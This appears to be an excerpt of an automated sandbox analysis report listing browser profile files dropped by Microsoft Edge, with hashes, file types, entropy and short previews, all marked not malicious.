                                                                                                                                                                  MD5:206702161F94C5CD39FADD03F4014D98
                                                                                                                                                                  SHA1:BD8BFC144FB5326D21BD1531523D9FB50E1B600A
                                                                                                                                                                  SHA-256:1005A525006F148C86EFCBFB36C6EAC091B311532448010F70F7DE9A68007167
                                                                                                                                                                  SHA-512:0AF09F26941B11991C750D1A2B525C39A8970900E98CBA96FD1B55DBF93FEE79E18B8AAB258F48B4F7BDA40D059629BC7770D84371235CDB1352A4F17F80E145
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000002.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):224
                                                                                                                                                                  Entropy (8bit):5.168711586230653
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iOnZhuReqJYDhP5c23oH+TcwtU4ERcFOjB2KLl1Zhs5h7g:7nrPhYebUJOMjFLr6Vg
                                                                                                                                                                  MD5:52DBE84E1D2FEE572FDB86D358846304
                                                                                                                                                                  SHA1:CD586A5C77CD45DDEC5AF66B5F1F654827BAAA6B
                                                                                                                                                                  SHA-256:AC2ADF825406180CF3AAC6DFCC46A43D281C0751FEAC1591F048459D45DA790C
                                                                                                                                                                  SHA-512:1B24E69B6EC419F354DB595516EECDBC8313AA4359415B6ACD2E1B60DD7F9E67FD56A122A27F31F2D6DF9B3E34B469637A8BE2783AD7FCC3B31A8C5A77B7185A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/11-01:54:30.667 5a8 Creating DB C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb since it was missing..2025/01/11-01:54:30.755 5a8 Delete type=3 #1.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000001

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000002

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:MPEG-4 LOAS
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):50
                                                                                                                                                                  Entropy (8bit):4.948758439731456
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Ukk/vxQRDKIVqU0blS:oO7iblS
                                                                                                                                                                  MD5:22BF0E81636B1B45051B138F48B3D148
                                                                                                                                                                  SHA1:56755D203579AB356E5620CE7E85519AD69D614A
                                                                                                                                                                  SHA-256:E292F241DAAFC3DF90F3E2D339C61C6E2787A0D0739AAC764E1EA9BB8544EE97
                                                                                                                                                                  SHA-512:A4CF1F5C74E0DF85DDA8750BE9070E24E19B8BE15C6F22F0C234EF8423EF9CA3DB22BA9EF777D64C33E8FD49FADA6FCCA26C1A14BA18E8472370533A1C65D8D0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:V........leveldb.BytewiseComparator...............

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):0.340905649345012
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLiqiUnGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiZNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                  MD5:B11E5455DBFF7FCC2B02933DB574441D
                                                                                                                                                                  SHA1:3EE66D609B4260B5A65524E2E2B6AF5E88B07EEF
                                                                                                                                                                  SHA-256:083E9F0A764A91F7E1DE106C893A78BF46321585E0682C54C4B690433FF87903
                                                                                                                                                                  SHA-512:9ABC60253E12F631EF11C70CFD4D8C2FAEFE17853AB83AAA43ED90484B76BCE016F3E51D7EB602239C97F87987F08B433F10836168C06CA195F54A8BE8319BF0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................S`.........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\ed2893b3-c687-4a7c-b689-8ffe9fadc236.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):23938
                                                                                                                                                                  Entropy (8bit):5.590717864849618
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:naSfCtvFeKhOObJ+UoAYDCx9TuqZz0VfUCh7xbog/OV9LlG9yCBrU6gpFIOIjuD:na4W9e8F1+UoAYDCx9Tuqh0VfUC9xboh
                                                                                                                                                                  MD5:1BCE8C574293FAA028177E9D1F5FF28E
                                                                                                                                                                  SHA1:6ED23082468D9B6D631FF5984D19CBF31511ADBB
                                                                                                                                                                  SHA-256:BB8666FD5E47FEE0B899D80AACBD126F2EE84B0F10649B68709FEAA80350B65B
                                                                                                                                                                  SHA-512:8249F783929BDC57AC5CE00A6220F92934F0D3464E2030DB0B2036092CEE310D943E68EA123DC0AA86CEBB705C310A6E722B9656947582459A5FCE5787ACD128
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"extensions":{"settings":{"ampmimodbocknpfehkbdjolnnbongejb":{"state":1},"dgiklkfkllikcanfonkcabmbdfmgleag":{"active_permissions":{"api":[],"manifest_permissions":[]},"commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13381052066563424","location":5,"manifest":{"content_capabilities":{"include_globs":["https://*excel.officeapps.live.com/*","https://*onenote.officeapps.live.com/*","https://*powerpoint.officeapps.live.com/*","https://*word-edit.officeapps.live.com/*","https://*excel.partner.officewebapps.cn/*","https://*onenote.partner.officewebapps.cn/*","https://*powerpoint.partner.officewebapps.cn/*","https://*word-edit.partner.officewebapps.cn/*","https://*excel.gov.online.office365.us/*","https://*onenote.gov.online.office365.us/*","https://*powerpoint.gov.online.office365.us/*","https://*word-edit.gov.online.office365.us/*","https://*excel.dod.onli

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 2, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                  Entropy (8bit):0.3520970289101682
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLClFwaBg9LBgVDBgQjiZBgKuFtuQkMbmgcVAzO5kMCgGUg5OR:TLSdBgtBgJBgQjiZS53uQFE27MCgGZsR
                                                                                                                                                                  MD5:55F778626761B226D19C9C8274DF2439
                                                                                                                                                                  SHA1:43C5D4AF9773FF84D0FF187A4E1A72E6804B82E7
                                                                                                                                                                  SHA-256:DD487DC1556A3E1FBDFCF3151839B07A5B9EC36B4554F1A7BB35A97CACE60839
                                                                                                                                                                  SHA-512:DB63B2D2A5AC074244EA937DE49E110C36B5AF2C5B0698C51E5A0B93163703FB2BDDBEF9A700B7A66D1C96709A9FD702D5597DEF9FCD6CEA3F50D1C0BE88ED20
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................S`......Q......Q......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3036000, writer version 2, read version 2, file counter 1, database pages 1, cookie 0, schema 0, unknown 0 encoding, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4096
                                                                                                                                                                  Entropy (8bit):0.0900719749007182
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:lSWFN3sl+ltl1FolvXll:l9Fys1Po
                                                                                                                                                                  MD5:FBA3A6CE4B85E7F019F2335DDE78F3E3
                                                                                                                                                                  SHA1:27C357AB868CCFDB0EAD5A7DBA20F0AB1A178243
                                                                                                                                                                  SHA-256:0288655CBF53C3C1C838B83AA061C1BB960004D99652857589DF08BE3BE4C8F8
                                                                                                                                                                  SHA-512:F0D44E3DE5FBD2D124D3523E053CFA79BE5640E4FD2CFB4FC21F91CEF226540A22328E15A414C6C69D792ECE4C7FC7A8E86A7BF8F11C055324B89DE00469BD48
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-journal

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                  Entropy (8bit):0.27718562076190567
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:7FEG2l/tZXl/lFll:7+/l/tp
                                                                                                                                                                  MD5:A5CAD0922B8BC541AB1384ECAFA9F876
                                                                                                                                                                  SHA1:6FBC4A02AB68B31E5736D323E41DAC344F21F577
                                                                                                                                                                  SHA-256:A4225C87E96B9955ED044CC062357741F9AA779345B1E746B7FEBF00F4C4B37E
                                                                                                                                                                  SHA-512:32EF7EAF37AA8F9BE0BB4169B0611423AAACD539DFA8A185C22C4A1CF4FC268E957105058CEED3838C6B6CC7A74F75FCEC9C692027D106F47F47A65924F18B65
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.... .c....... A................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                  Entropy (8bit):0.7974299558090553
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:4onnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnE/yjyjyjyjyjY:4lWsoC5cmtrWAEw
                                                                                                                                                                  MD5:B9C0EE71AE36A0DA6BC330F9263D687F
                                                                                                                                                                  SHA1:AC31BBA358CAC0916823E9F86CAC705A62674D85
                                                                                                                                                                  SHA-256:38AF9BD87714F041BA4B2C1ECB48CAE00232101FB2A001FD1635A2F922E7419E
                                                                                                                                                                  SHA-512:F6C095CD0B0DB6AD1C8B17A220FD2CBC6257E90BBD8B11C3F06F3EDB37F4F92C586531E20C5948927712B55C4C8A231623B33C3C89EECFDE1FFAE727BBAAA96C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..-.............F...........D.<Iy..M...jg.......-.............F...........D.<Iy..M...jg.............A...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3452592
                                                                                                                                                                  Entropy (8bit):3.9991046558346786
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:BpC6Ki1MUCTwmcFFug7yww4A/ahG+97D+PVdHtSbv0hhFmzcTinNNHqQhy937DQ9:5
                                                                                                                                                                  MD5:C86C276F67CAF9D6741E1BC7CBCB3D13
                                                                                                                                                                  SHA1:0D795EFF0C4D3DD4D731C6C169A66284F9D4AC6D
                                                                                                                                                                  SHA-256:9E119DB26A90DABE4E916854C3CFF03347867958012F7902C28BACB548AA6BA7
                                                                                                                                                                  SHA-512:22F9F137A0CF548C08DA2AF2DCE668AECD8AFB288F340236E102273874230D3D8DEE72CEC124162592BBAC9BCCBF65D1481D1346916BE599643BCA7002E5C8F3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:7....-..........Iy..M...af|\.._N........Iy..M...X..r.8SQLite format 3......@ ..........................................................................S`............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000001.dbtmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):232
                                                                                                                                                                  Entropy (8bit):5.191544479427758
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:VVXntjQPEnjQRptG6lhs6lgR6D5WPtKOCG+UI5WPtKOCv2a+MZ4NyN1FMZ4N1cn:/XntM+wDGJR6t4K7t4KoT3NSF3N1cn
                                                                                                                                                                  MD5:A443D67E73604650C3D3F31ABA6978BF
                                                                                                                                                                  SHA1:D341F2C3F25BF0BD03BE22F7294AAC9353943381
                                                                                                                                                                  SHA-256:7956CED0D3A60E93AD3F5E6A44EBB7BD71AACF3E4B07D9A1A8D3C5518830BCE8
                                                                                                                                                                  SHA-512:C5E4A379AE71A29141FB1947319CBA48BB7D31E3F81811F24A3545135FB799C382AA3DE27E873C67414B03B7DA9B306C6F236B477E3F967EC6163116A681AE41
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:A..r.................20_1_1...1.,U.................20_1_1...1.+...................4_IPH_LiveCaption...IPH_LiveCaption......4_IPH_PasswordsAccountStorage!..IPH_PasswordsAccountStorage......4_IPH_ProfileSwitch...IPH_ProfileSwitch....

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):333
                                                                                                                                                                  Entropy (8bit):5.249323794794118
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iOnvtj4MJYDhP5c23oH+Tcwtfrl2KLl1Vh4q2TYDhP5c23oH+TcwtfrK+IFUv:7nvtj4rPhYeb1LrVh4vsPhYeb23FUv
                                                                                                                                                                  MD5:024F95692E265A78FA22CF17B8242228
                                                                                                                                                                  SHA1:E43B008BAD52423EA746B8B60D52A2E1BFF00307
                                                                                                                                                                  SHA-256:E90DEACC156422F88C020CD738890A3F0AFA367F1DECAB0FF800AA6A19886304
                                                                                                                                                                  SHA-512:1070085156AEFA36B2E826BF92A3CB9B6D5D9F98436EA52E56720E932235187EEECEE9212A4233A8A9A1B5D37B54E400DD30250DF131978E0CBF28F567EF31C4
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/11-01:54:28.565 1464 Creating DB C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db since it was missing..2025/01/11-01:54:28.608 1464 Reusing MANIFEST C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000001.dbtmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):526
                                                                                                                                                                  Entropy (8bit):3.9128078536884288
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:G0nYEQWddZ5ywZdFPEWXZi+5oKAk7blt0:G0nYEQWd35ywZP9i+lA8i
                                                                                                                                                                  MD5:38776C76D0EA5547595AA8637B859D98
                                                                                                                                                                  SHA1:9C1B8F71FEABF422D2EDFA2EA3EBFF85C108F135
                                                                                                                                                                  SHA-256:D36A7D7AEDB2D26AD2E57BF50FF98013F5F568D8F41DA1AC652A8783E20F1D36
                                                                                                                                                                  SHA-512:3D4F9BFB9441B3C8EF3EAC4153F3FFCBAF876E51B2DAB29C081A255B574650A35128A6CFE7DAA685323610F4A17832666FE709798D41D59E9323DCF2AFB8B550
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.h.6.................__global... .t...................__global... ..'i..................21_........................21_......ah0.................20_.....'...................20_.......T=.................19_.....*...................18_.....L....................3_.....Z..+.................4_.......w<.................20_.........................20_..........................19_.....}....................18_.......$..................3_.....l.I..................4_........q.................9_......!ig.................9_.....

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):351
                                                                                                                                                                  Entropy (8bit):5.223285564712569
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iOn6x4MJYDhP5c23oH+Tcwtfrzs52KLl1vBUbN4q2TYDhP5c23oH+TcwtfrzAdIg:7ne4rPhYebs9LrvibN4vsPhYeb9FUv
                                                                                                                                                                  MD5:B311725696D6C825A352D56A67ADF694
                                                                                                                                                                  SHA1:B1DFAC551091892920911B25281A857FD721A96C
                                                                                                                                                                  SHA-256:26FE30DE122978C0BB4A85EB80C0FC6A0CC2051297BDC77DBC03C5754E21E837
                                                                                                                                                                  SHA-512:6D9B13E0E6B59FB3064161FE614CE0318848540C1C63D383FF8F18044BB2548EC66AF2100647DB79D3CB15346E206BAB08871F66F85FD2FE5A855D3AC68D599A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/11-01:54:27.875 1464 Creating DB C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata since it was missing..2025/01/11-01:54:28.548 1464 Reusing MANIFEST C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Functional Data

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3036000, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4096
                                                                                                                                                                  Entropy (8bit):0.09255907315217722
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:lSWFN3l/klslpL/lvXll:l9F8E1l
                                                                                                                                                                  MD5:D0ADE2BC9FC14FB88A095213DAA00A9B
                                                                                                                                                                  SHA1:D6615FE9FDF369535907683CF80EABA7F47D9535
                                                                                                                                                                  SHA-256:855E259F99088D8E801B79C64C4D332D272B8179765E2B2EA1F305BA58FECB8C
                                                                                                                                                                  SHA-512:927A031EB3F940F868B97EBC464106C547548D168057EF414E7CDE4373053A3DD355860D52A14FC0368C23B7589992CD9D4FE59B8E7D7F3E45F1E41F6180BA5B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Functional Data-journal

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4616
                                                                                                                                                                  Entropy (8bit):0.13801330818439836
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:7FEG2l+N8/ul/FllkpMRgSWbNFl/sl+ltlslVFolvXllN8n:7+/lLIg9bNFlEs1Evo18n
                                                                                                                                                                  MD5:9E368B1E044FD65D7232E3BF136BB7D4
                                                                                                                                                                  SHA1:FB17DA6A3CADF6101091E871585F761FEAA37A68
                                                                                                                                                                  SHA-256:88E211F89FC85E3DBD4AE4E558374F5E5C8B528A985E52FF63F1D43498249514
                                                                                                                                                                  SHA-512:F370B156F99B7B6114BD0AA73A3D60972186AF774054CBBAF1FA67AB911858BA401A33F5EA32971CBA0CE084C74EA5360569AFEAA20D91646B3C375C8C0332D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.... .c.....k.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..........................................................................S`................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Functional Data-wal

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):45352
                                                                                                                                                                  Entropy (8bit):0.39511584862387333
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:K4MZ4e3QuzRDOsnZll7DBtDi4kZERD5heqt8VtbDBtDi4kZERD0G:cv3QMLnZll7DYMjeO8VFDYMAG
                                                                                                                                                                  MD5:E79D131D638D3E192027F3E1875C3DBA
                                                                                                                                                                  SHA1:081091FDAF9835DE3D382AC01476C845268C22C4
                                                                                                                                                                  SHA-256:BB3E6C0ABE94E9A15847CA5B4D6A39C5A8D82887C0679A0F446BC40731B44601
                                                                                                                                                                  SHA-512:3104A439D6AA86F0652512E64D902CC28CE135AC36992518C28513CCB01B07365BB74B9EEC5826B0D47A10EFA821A38244588EE9D13AA022E55A86A497435946
                                                                                                                                                                  Malicious:false
